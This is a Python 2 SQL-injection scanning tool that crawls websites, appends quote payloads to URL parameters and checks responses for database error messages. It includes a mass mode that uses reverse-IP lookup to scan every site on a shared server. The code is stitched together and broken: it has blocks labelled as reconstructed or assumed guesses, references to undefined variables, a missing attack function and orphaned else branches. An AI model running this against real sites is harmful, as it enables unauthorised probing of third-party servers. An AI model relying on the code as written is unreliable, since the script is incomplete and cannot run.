Domain SQLi Finder - Py
# This was written for a Penetration Test assessment and is for educational purposes only. Use it at your own risk.
# The author will not be responsible for any damage!
# Intended for authorized Web Application Pen Testing only!
import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime
import DomainReverseIPLookUp
# The following three variables get their values from command-line arguments: either the user's value or the default
pagesToCrawl = ""                           # Number of pages to crawl in a website
maxVulInjectableParam = ""                  # Maximum number of vulnerable pages (parameters) to find
output = ""                                 # Output file name - append mode (a)

reverseLookUp = "DSQLiReverseLookUp.txt"    # Output file name for reverse-IP lookup - write+ mode (w+)
crawlDump = 'DSQLiCrawlerOutput.txt'        # Stores crawling result for the current crawl only - write+ mode (w+)
uniqueLinksDump = 'DSQLiUniqueLinks.txt'    # Stores crawling result for the current scan only - write+ mode (w+)
errorDump = 'DSQLiErrorDump.txt'            # Dumps handled errors - append mode (a)
sitesToScan = ""                            # Maximum number of sites to scan on a domain in case of Mass-Mode Attack
maxVulSites = ""                            # Maximum number of vulnerable sites to find in Mass-Mode Attack
reverseFlag = 0                             # Determines whether the reverseLookUp file is generated by the script or supplied by the user
maxVulSitesFlag = 0                         # Tracks how many vulnerable sites have been found in Mass-Mode Attack
verbose = 0                                 # Determines what messages to display on screen (0 or 1)
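
# The scan loop in check_SQLi() appends each payload ('pload') to a URL and greps the response against
# sqlErrors; these minimal definitions are assumptions sketched from that usage, not the author's lists:
sqlPayloads = ["'"]                                         # Classic quote-breaking test
sqlErrors = ["You have an error in your SQL syntax",        # MySQL
             "Warning: mysql_fetch",                        # PHP/MySQL
             "Microsoft OLE DB Provider for SQL Server",    # MSSQL
             "Unclosed quotation mark",                     # MSSQL
             "ORA-01756"]                                   # Oracle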
def banner():
    print r"""
    Greetz to:
    (www.garage4hackers.com)

     GGGGGG\
    GG  __GG\
    GG /  \__| aaaaaa\  rrrrrr\  aaaaaa\  gggggg\  eeeeee\
    GG |GGGG\ \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\
    GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
    GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
    \GGGGGG |\\aaaaaaa |rr |     \\aaaaaaa |\ggggggg |\\eeeeeee\
     \______/ \_______|\__|      \_______| \____gg | \_______|
                                            gg\   gg |
                                            \gggggg  |
                                             \______/

    ###################################################################
    """
    print "\tUsage: python %s [options]" % sys.argv[0]
    print "\t\t-h help\n"
    call_exit()
def call_exit():
    print "\n\tExiting ...........\n"
    sys.exit(0)
# Tests SQLi on all unique links and parameters by appending the sqlPayload and checking the source
def check_SQLi(uniqueUrls):
    sqliUrls = []       # Will contain the sorted URLs, ready to be appended with sqlPayloads
    flag = 0            # Checks whether the desired 'n' number of vulnerable pages has been found
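    # How sqliUrls gets populated is assumed: each unique URL is cut back to its last '=' so the
    # payload lands directly after a parameter (a sketch, not the author's exact transformation):
    for link in uniqueUrls:
        sqliUrls.append(link[:link.rfind("=") + 1])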
    sqliUrls = list(set(sqliUrls))              # By now this list has all injectable parameters, ready to append the sqlPayload
    parsed = urlparse.urlparse(uniqueUrls[0])   # Used later to obtain the website name (any of the unique URLs yields the netloc)
    now = datetime.datetime.now()               # Current time of scanning, to put in the DSQLiResults output file

    try:
        fd_output = open(output, 'a')
        fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + now.strftime("%Y-%m-%d %H:%M") + ")\n")    # Write the URL base name to the output file
    except IOError:
        print "\n\t[!] Error - could not open|write file %s \n" % output
    if verbose == 1:
        print "\n[*] Testing SQLi on following URLs:"
        for link in sqliUrls:
            print "\t[-] URL: ", link
    else:
        print "\n[*] Testing SQLi on URLs ....."
    # In the following loop, the 'flag' counter is what finds the requested 'n' vulnerable pages. When a limited number
    # of pages has to be found, 'flag' tells whether the script has reached that count yet; once it matches, all loops
    # break and control comes out. If the links in sqliUrls run out before the limit is reached, control also leaves
    # the loops. With the default (0), i.e. find all pages, 'flag' plays no role other than incrementing itself.
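    # Loop openings reconstructed from the use of 'link' and 'pload' below; the payload list name
    # sqlPayloads is an assumption (a minimal sketch of it sits near the top of the script):
    for link in sqliUrls:
        for pload in sqlPayloads: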
            try:
                source = urllib2.urlopen(link + pload).read()   # Append the sqlPayload and read the source for errors
            except urllib2.HTTPError, err:
                if err.code == 500:
                    if verbose == 1:
                        print "\t\t[!] Error - HTTP Error 500: Internal Server Error"
                        print "\t\t[-] Continuing with next link"
                    continue
                else:
                    if verbose == 1:
                        print "\t\t[!] Error - HTTP Error xxx"
                        print "\t\t[-] Continuing with next link"
                    continue
            for errors in sqlErrors:
                if re.search(errors, source) != None:       # An SQL error string was found in the page source
                    fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link + pload + "\n")
                    print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s)\n" % (link + pload, errors)
                    if maxVulInjectableParam != 0:          # i.e. only 'n' vulnerable parameters have to be found
                        if flag < maxVulInjectableParam:
                            flag = flag + 1
                        else:
                            break
                    else:                                   # i.e. all vulnerable pages have to be found
                        flag = flag + 1
                    break
                else:
                    if verbose == 1:
                        print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors
                    else:
                        pass

        if maxVulInjectableParam != 0 and flag == maxVulInjectableParam:    # i.e. 'n' pages have already been found
            break
    if flag != 0:
        print "\n\t[-] Target is vulnerable to SQLi, check the log file"
        print "\t\t[-] %d vulnerable injectable parameters found" % (flag)
        global maxVulSitesFlag
        maxVulSitesFlag = maxVulSitesFlag + 1   # Increment the flag which tracks how many vulnerable sites have been found in a Mass-Mode Attack
    else:
        print "\n\t[-] Target is not vulnerable to SQLi"
        try:
            fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n")
            fd_output.close()   # Close the file after each URL so the log can be inspected instantly, instead of waiting for the whole script to finish
        except IOError:
            print "\n\t[!] Error - file I/O error\n"
    try:
        fd_output.close()
    except IOError:
        pass
# Finds the unique URLs among all crawled URLs and saves them to a list.
# Concept: parse the URL and find its injectable parameter(s); check the combination of [netloc, path and injectable
# parameters] against the combinations found earlier. If unique, update the uniqueUrls list; else go to the next URL
# and parse it through the same procedure.
def unique_urls(unsortedUrls):
    print "\n[*] Finding unique URLs ....."
    list_db = []        # Temporary storage to compare parameters with the ones already found
    uniqueUrls = []     # Will finally hold the unique URLs
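    # Per-link loop opening reconstructed from the code below; 'num' is assumed to count the '=' signs
    # in each link, which is what the IndexError comment further down implies:
    for link in unsortedUrls:
        parsed = urlparse.urlparse(link)    # netloc/path/query breakdown of the current link
        list_tmp = []                       # Injectable parameter names of the current link
        num = link.count("=")               # Assumed: one '=' per injectable parameter
        try: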
            for x in xrange(num):
                list_tmp.append(parsed.query.split("&")[x].rsplit("=", 1)[0])   # list_tmp collects all injectable parameter names as its elements
        except IndexError:
            # Some links embed an external URL, which raises the number of "=" in the link; the loop then
            # runs one extra time and produces an out-of-range index error.
            if verbose == 1:
                print "\n\t[!] Error - List Index Out of Order - check %s and report to author" % (errorDump)
            try:
                fd_errorDump = open(errorDump, 'a')
                fd_errorDump.write("\n\t[*] Error occurred inside unique_urls function for:\t" + parsed.query)
            except IOError:
                print "\n\t[!] Error - could not open|write file %s \n" % errorDump
            continue
        if list_tmp in list_db:         # For the first URL this condition always fails, as list_db is still empty
            continue                    # i.e. the same parameters, just with different values, have been found before
        else:
            list_db.append(list_tmp)    # Record the newly found unique parameters
            uniqueUrls.append(link)     # Update the list with the unique complete URL
    if verbose == 1:
        for link in uniqueUrls:
            print "\t[-] Unique link found: ", link
    try:
        fd_uniqueLinkDump = open(uniqueLinksDump, 'a')
        for link in uniqueUrls:
            fd_uniqueLinkDump.write(link + '\n')
        fd_uniqueLinkDump.close()
    except IOError:
        print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump
    check_SQLi(uniqueUrls)      # Call the SQLi check function to test the unique URLs for vulnerability
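
# Reconstructed opening for the crawler ('crawl_site' is the name the code below calls with each target):
def crawl_site(url):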
    spider = chilkat.CkSpider()     # Using the Chilkat library; some modules are free
    spider.Initialize(url)
    spider.AddUnspidered(url)
    spider.CrawlNext()
    crawlerOutput = []      # Will hold the pagesToCrawl number of pages of the URL
    for i in range(0, int(pagesToCrawl)):
        success = spider.CrawlNext()
        if (success == True):
            if verbose == 1:
                if i % 50 == 0:
                    print "\n[-] %d percent of %d pages to crawl complete\n" % ((i * 100) / int(pagesToCrawl), int(pagesToCrawl))
                print "\t", spider.lastUrl()
            else:
                sys.stdout.flush()
                print ".",      # In the non-verbose case, print dots to show the progress
            crawlerOutput.append(spider.lastUrl())
        else:
            if (spider.get_NumUnspidered() == 0):
                print "\n\t[-] No more URLs to spider"
                i = i - 1       # Decrement, else the total pages crawled gets a +1 over-count
                break
            else:
                print spider.lastErrorText()
                continue
        spider.SleepMs(10)
    try:
        fd_crawlDump = open(crawlDump, 'a')     # Log every crawled link
        for link in crawlerOutput:
            fd_crawlDump.write(link + '\n')
        fd_crawlDump.close()
    except IOError:
        print "\n\t[!] Error - could not open|write file %s \n" % crawlDump
    if verbose == 1:
        print "\n[*] Parsing URLs to collect links with '=' in them ....."
    urlsWithParameters = []     # Only those URLs which have '=' in them, i.e. injectable parameter(s)
    for link in crawlerOutput:
        if link.count("=") > 0:
            urlsWithParameters.append(link)
    if urlsWithParameters != []:
        if verbose == 1:
            print "\t[-] Done"
        unique_urls(urlsWithParameters)     # Time to find the unique URLs among all with '=' in them
    else:
        print "\n\t[!] No injectable parameter found"
        now = datetime.datetime.now()       # Current time to put in the DSQLiResults output file
        try:
            parsed = urlparse.urlparse(url)
            fd_output = open(output, 'a')
            fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + now.strftime("%Y-%m-%d %H:%M") + ")\n")    # Write the URL base name to the output file
            fd_output.write("\t\tNo injectable parameter found\n")
            fd_output.close()
        except IOError:
            print "\n\t[!] Error - could not open|write file %s \n" % output
    if reverseFlag == 0:    # i.e. the --reverse switch was not used on the console, so do the reverse-IP lookup and generate the result
        DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose)     # Pass the domain URL, output file name and verbose level
        try:
            fd_reverseLookUp = open(reverseLookUp, 'r')
            for url in fd_reverseLookUp.readlines():
                sites.append(url)       # The sites list contains all the domains hosted on the server
        except IOError:
            print "\n\t[!] Error - %s file missing" % reverseLookUp
            print "\t[-] Generate it using the --reverse switch or get domains from some reverse IP lookup website"
            call_exit()
    elif reverseFlag == 1:  # i.e. the --reverse switch is mentioned, so skip the reverse-IP lookup and read the already generated file
        try:
            fd_reverseLookUp = open(reverseLookUp, 'r')
            for url in fd_reverseLookUp.readlines():
                sites.append(url)       # The sites list contains all the domains hosted on the server
        except IOError:
            print "\n\t[!] Error - %s file missing" % reverseLookUp
            print "\t[-] Generate it using the --reverse switch or get domains from some reverse IP lookup website"
            call_exit()
    if len(sites) % 10 != 0:
        sites = sites[0:(len(sites) % 10)]
    else:
        sites = sites[0:((len(sites) + 2) % 10)]
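    # Loop opening and counter initializations reconstructed from their use below:
    deadLinks = 0       # Counts targets that fail URL verification
    counter = 0
    for site in sites:
        try: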
            if site[:7] != "http://":       # Prepend http:// to the URL, if not already done by the user
                site = "http://" + site     # What about https sites?
            site = site[:-1]                # Remove the trailing \n from each element
            print "-" * 80
            print "\n[*] Target URL - %s ....." % (site)
            if verify_URL(site) == True:    # Function call to verify that the URL exists
                print "\t[-] URL Verified\n"
                crawl_site(site)            # Pass the site to the crawl function
            else:
                print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site
                deadLinks = deadLinks + 1
                continue
        except KeyboardInterrupt:
            decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ")
            if decision == 'C' or decision == 'c':
                continue
            elif decision == 'q':
                print "\n[!] Error - user aborted"
                call_exit()
            else:
                print "\n\tEnjoy: oo=========> (|)"
                call_exit()
        counter = counter + 1       # Count only those sites which really got scanned
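
# Reconstructed opening for the URL existence check ('verify_URL' is the name the callers use);
# deriving 'host' and 'path' from urlparse is an assumption:
def verify_URL(url):
    parsed = urlparse.urlparse(url)
    host = parsed.netloc
    path = parsed.path or "/"       # The HEAD request needs a non-empty path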
    try:
        conn = httplib.HTTPConnection(host)
        conn.request('HEAD', path)
        status = conn.getresponse().status
        conn.close()
    except StandardError:
        status = None
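    return status in (200, 301, 302)    # Assumed success criterion - the callers only ever test for True

# Reconstructed opening for the argument parsing routine ('parseArgs' is what main() calls); the actual
# argument definitions (--url/--durl, --crawl/--dcrawl, --pages, --sites, --vulsites, --reverse, --verbose,
# output file names) are assumed to be registered on this parser in the original:
def parseArgs():
    parser = argparse.ArgumentParser(description='Domain SQLi Finder')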
    # Mind it - group1 and group2 use the same parameters "crawl" and "pages". So whether the console gets
    # --crawl or --dcrawl, both update the same variable "crawl" and ultimately the global pagesToCrawl.
    # The same goes for "pages".
    args = parser.parse_args()

    # Check whether a value was passed to each argument; e.g. --crawl without a value would pass "None" and crash
    # the program. All of these switches have default values, so the user either leaves them off the command line
    # or must put a value in them.
    if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None):
        print "\n\t[!] Error - insufficient number of value(s) passed to argument(s)"
        call_exit()

    # Check to make sure the numeric value of vulsites is less than sites, and pages is less than crawl
    if args.sites < args.vulsites:
        print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
        call_exit()
    elif args.crawl < args.pages:
        print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
        call_exit()
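    # The two 'else' comments below imply exactly this pair of enclosing verbosity checks, so they are
    # reconstructed here; switching the module-level 'verbose' flag on is likewise an assumption:
    if args.verbose != None:
        if args.verbose == 1:
            global verbose
            verbose = 1     # Assumed: propagate the console value to the module-level flag
            print "\n[*] Verbose Mode On"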
            global reverseLookUp    # Declared here as it is used a couple of times in this function
            if args.URL != None:    # Verbose mode for --url
                print "\t[-] Pages to crawl (default=500): ", (args.crawl)
                print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages)
                print "\t[-] Output file name: %s" % (args.siteOutput)
            if args.DURL != None:   # Verbose mode for --durl
                print "\t[-] Number of sites to scan on domain (default=0 i.e. all): ", (args.sites)
                print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites)
                print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl)
                print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages)
                if args.reverseLookUp != None:  # i.e. the reverse look-up file name is mentioned on the console
                    print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0])
                else:
                    print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp
        else:                       # i.e. the value 0 is passed to --verbose
            print "\n[*] Verbose Mode Off"
    else:                           # i.e. verbose has the value None; it has been passed without a value
        print "\n[*] Verbose Mode Off (by default)"
        global reverseFlag      # Determines whether the reverseLookUp file is generated by the script or supplied by the user
        reverseFlag = 1
        attack_Domain(args.DURL[0])
    else:                       # i.e. --reverse is not mentioned on the command prompt; our code shall generate one
        print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
        if verify_URL(args.DURL[0]) == True:
            print "\t[-] Domain Verified\n"
            attack_Domain(args.DURL[0])
        else:
            print "\n\t[-] Domain could not be verified."
            call_exit()
def main():
    # clear_screen()
    if len(sys.argv) < 2:
        banner()
    parseArgs()     # Parse the command line arguments
    call_exit()
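
# Assumed entry point; the original presumably ends by invoking main():
if __name__ == '__main__':
    main()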